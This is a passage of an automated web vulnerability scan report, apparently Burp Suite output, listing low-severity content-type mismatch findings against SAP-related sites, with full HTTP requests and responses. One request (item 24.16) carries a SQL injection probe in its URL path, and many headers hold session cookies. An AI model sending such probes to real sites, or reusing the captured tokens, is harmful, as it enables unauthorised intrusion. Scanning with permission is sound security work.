Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; ASP.NET_SessionId=3mmip455whoq0f55gcf2phvg; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

<formData clickAnalysis='1' click='1'/>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:28:18 GMT
Content-Length: 100

<?xml version="1.0" encoding="utf-8"?><content><outcome success="1" reqId="" command="" /></content>
24.10. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannelDetails.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://smepartnerfinder.sap.com
Path:   /services/LeadGeneration/SalesChannelDetails.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

POST /services/LeadGeneration/SalesChannelDetails.aspx HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
Content-Length: 33
Origin: http://smepartnerfinder.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: text/xml
Accept: */*
Referer: http://smepartnerfinder.sap.com/Media/Flash/AppShell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; ASP.NET_SessionId=3mmip455whoq0f55gcf2phvg; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

<formData salesChannelId='790'/>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:04 GMT
Content-Length: 1748

<?xml version="1.0" encoding="utf-8"?><content><outcome success="1" reqId="" command="" /><SalesChannel id="790" externalId="38835" isEbmPartner="0" logoUrl="http://smepartnerfinder.sap.com/saleschann
...[SNIP]...
24.11. http://smepartnerfinder.sap.com/services/LeadGeneration/SalesChannels.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://smepartnerfinder.sap.com
Path:   /services/LeadGeneration/SalesChannels.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

POST /services/LeadGeneration/SalesChannels.aspx HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
Content-Length: 32
Origin: http://smepartnerfinder.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
content-type: text/xml
Accept: */*
Referer: http://smepartnerfinder.sap.com/Media/Flash/AppShell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; ASP.NET_SessionId=3mmip455whoq0f55gcf2phvg; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

<formData frontendVersion='1'/>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:28:29 GMT
Content-Length: 463185

<?xml version="1.0" encoding="utf-8"?><content><outcome success="1" reqId="" command="" /><SalesChannels><SalesChannel id="853" logoUrl="http://smepartnerfinder.sap.com/saleschannel/Media/Image/SalesC
...[SNIP]...
24.12. http://store.businessobjects.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.businessobjects.com
Path:   /DRHM/store

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /DRHM/store?Action=DisplayPage&SiteID=bobjamer&Locale=en_US&Env=BASE&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; extcmp=null; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689060945; fcR=http%3A//www.sap.com/index.epx; fcC=X=C2033968180&Y=1318689061488&FV=10&H=1318689060945&fcTHR=store.businessobjects.com}www.businessobjects.com; s_pers=%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%255D%7C1476541862905%3B%20c13%3Destores%253Aus%253Ahomepage%7C1318690862907%3B%20pe%3Dno%2520value%7C1318690862909%3B%20c3%3Dno%2520value%7C1318690862911%3B%20s_nr%3D1318689062915-New%7C1321281062915%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292662918%3B%20s_visit%3D1%7C1318690862919%3B%20gpv_p47%3Dno%2520value%7C1318690862922%3B%20s_ttc%3D1318688493%7C1350225062924%3B; s_sess=%20s_cc%3Dtrue%3B%20v13%3DCG4DA4BC51%3B%20v18%3D1%3B%20s_sq%3D%3B; mbox=check#true#1318689123|session#1318689062767-959486#1318690923|PC#1318689062767-959486.19#1319898665

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/css;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=96207132197,0)
Date: Sat, 15 Oct 2011 14:30:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 6617


<!-- REQUEST ID: TIME=1318689045654:NODE=c1a5001:THREAD=5918 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=bobjamer&ceid=176502300&cename=TopHea
...[SNIP]...
24.13. http://survey.112.2o7.net/survey/dynamic/suites/276/omniturecom-2011/list.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://survey.112.2o7.net
Path:   /survey/dynamic/suites/276/omniturecom-2011/list.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /survey/dynamic/suites/276/omniturecom-2011/list.js?1017395353699 HTTP/1.1
Host: survey.112.2o7.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Fhesx7Ebex7Ex7Fvx7Dx7Estrx7Ex7C=[CS]v4|2737302185161D3E-400001A26000301A|4E6EB475[CE]; s_vi_erx7Fillgdijg=[CS]v4|2737302185161D3E-400001A26000301C|4E6EB475[CE]; s_vi_nyhylx7B88x3F=[CS]v4|2737A31205158EF1-600001752000ED76|4E6F598F[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2737A31205158EF1-600001752000ED78|4E6F598F[CE]; s_vi_imx7Exxdnevx7Cx7Ech=[CS]v4|2737EACF051D3328-40000105A00A4E23|4E6FE0F9[CE]; s_vi_x7Ecgozoezfo=[CS]v4|273F763B851D0AD0-600001292004F341|4E7EEC75[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|273F778805160812-600001A3E03B8C61|4E7EEF10[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|273F778805160812-600001A3E03B8C63|4E7EEF10[CE]; s_vi_zocdx7Ex7Dhuyebx60h=[CS]v4|274278E405162358-400001A48009859F|4E84F1C7[CE]; s_vi_x7Cinsx7Fxxnjyhc=[CS]v4|274279178516188E-60000181A009BF0E|4E84F95C[CE]; s_vi_x7Cilgdijgnsx7F=[CS]v4|274278E405162358-400001A4800985A2|4E84F95C[CE]; s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2742D7A185160C0B-400001A6403B49A6|4E85AF42[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E85AF42[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E85AF42[CE]; s_vi_x7Ecprx7Dtxxx7Fetcprexxgt=[CS]v4|2742D7B70516058E-400001A48011F125|4E85AF42[CE]; s_vi_ygx60kkvx7Ex7Ckx7Dx7Dmac=[CS]v4|2742E48905010BCD-60000105E03C302F|4E85D0A9[CE]; s_vi_fxxx7Fttx7Feydbxxpberx7Ex7C=[CS]v4|2742E48E850110C2-40000108003ACF53|4E85D0BA[CE]; s_vi_x60tndctw=[CS]v4|2742E89D05013772-4000010500433CF5|4E85D137[CE]; s_vi_x60tndahx60=[CS]v4|2742E89E85160D39-600001A48031365B|4E85D13C[CE]; s_vi_x7Fbfngbmnenx7C=[CS]v4|27463796851D3ED1-60000126A002A7B2|4E8C6F2C[CE]; s_vi_snjbdhj=[CS]v4|274633B6051D0A7E-60000102000188EF|4E8C6F07[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E8DA48D[CE]; s_vi_dqx7Deyyx7Bfm=[CS]v4|2746D247051580E2-60000174A000C104|4E8DA48D[CE]

Response

HTTP/1.1 200 OK
Server: Omniture DC/2.0.0
Last-Modified: Wed, 27 Jul 2011 16:20:11 GMT
ETag: "2f81ec-3a-6c27e4c0"
Accept-Ranges: bytes
Content-Length: 58
Cache-Control: max-age=7776000
Expires: Mon, 05 Dec 2011 18:16:30 GMT
xserver: www485
Content-Type: application/javascript
Date: Sat, 15 Oct 2011 13:47:20 GMT
Connection: close

s_sv_globals.onListLoaded('','','','omniturecom-2011',[]);
24.14. http://weblogs.sdn.sap.com/api/get_wlg_info/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://weblogs.sdn.sap.com
Path:   /api/get_wlg_info/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /api/get_wlg_info/ HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:32 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 44

var s_prop3='scn:blog:category:sap teched';
24.15. http://weblogs.sdn.sap.com/pub/q/weblogs_rss  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://weblogs.sdn.sap.com
Path:   /pub/q/weblogs_rss

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /pub/q/weblogs_rss HTTP/1.1
Host: weblogs.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:01:38 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 15449

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<feed version="0.3" xmlns="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">

<title type="text/plain">SAP Deve
...[SNIP]...
24.16. http://weblogs.sdn.sap.com/pub/t/2716635132'%20or%201%3d2--%20  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://weblogs.sdn.sap.com
Path:   /pub/t/2716635132'%20or%201%3d2--%20

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /pub/t/2716635132'%20or%201%3d2--%20 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://weblogs.sdn.sap.com/pub/t/2716635132'%20or%201%3d2--%20
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D7%3B%20s_sq%3D%3B; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; mbox=session#1318688512533-813903#1318691832|check#true#1318690032; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2011 14:48:15 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 38
Connection: close
Content-Type: text/html

The server has encountered a problem.
24.17. http://www.asugonline.com/config/core/gc.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.asugonline.com
Path:   /config/core/gc.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /config/core/gc.txt?r=0.43147359089925885 HTTP/1.1
Host: www.asugonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.asugonline.com/swfs/MainApp.swf?ver2.0.11159
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hi12vc2iab2rdx45ml1cpz55; CmsAdmin=eventid=1&languageid=1; X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 30 May 2011 12:24:46 GMT
Accept-Ranges: bytes
ETag: "0fbaf8fc41ecc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:26:10 GMT
Content-Length: 1580

F++mnvlZoJfK6JKmsY1R7wc2f3dfrhz9vBa/vbp8r734zto/E8AcJjSnSgf4vaNXnWZpHcO1EBclPbFuCyf0yzu9z0zYMKjKpwP8f9DmfnaLa5RqFoOhIww3HB2t9dY1ApUDY+eQHxwPKGMCp5xFrvxLiIzwML94SihItZhuIAcexfSBrHzK/Jy/dNI6tobNpsDgzH
...[SNIP]...
24.18. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&extern=0&channel=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.facebook.com/extern/login_status.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&extern=0&channel=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.137.62
X-Cnection: close
Date: Sat, 15 Oct 2011 14:24:01 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
24.19. http://www.sap.com/global/ui/fonts/bensbk-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/fonts/bensbk-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /global/ui/fonts/bensbk-webfont.woff HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/global/ui/css/sapcom.css
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=7200
Content-Type: text/html
Server: Microsoft-IIS/7.5
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:21:13 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
24.20. http://www.sap.com/gwtservices/verifylogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sap.com
Path:   /gwtservices/verifylogin.epx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d2059162%26tstart%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
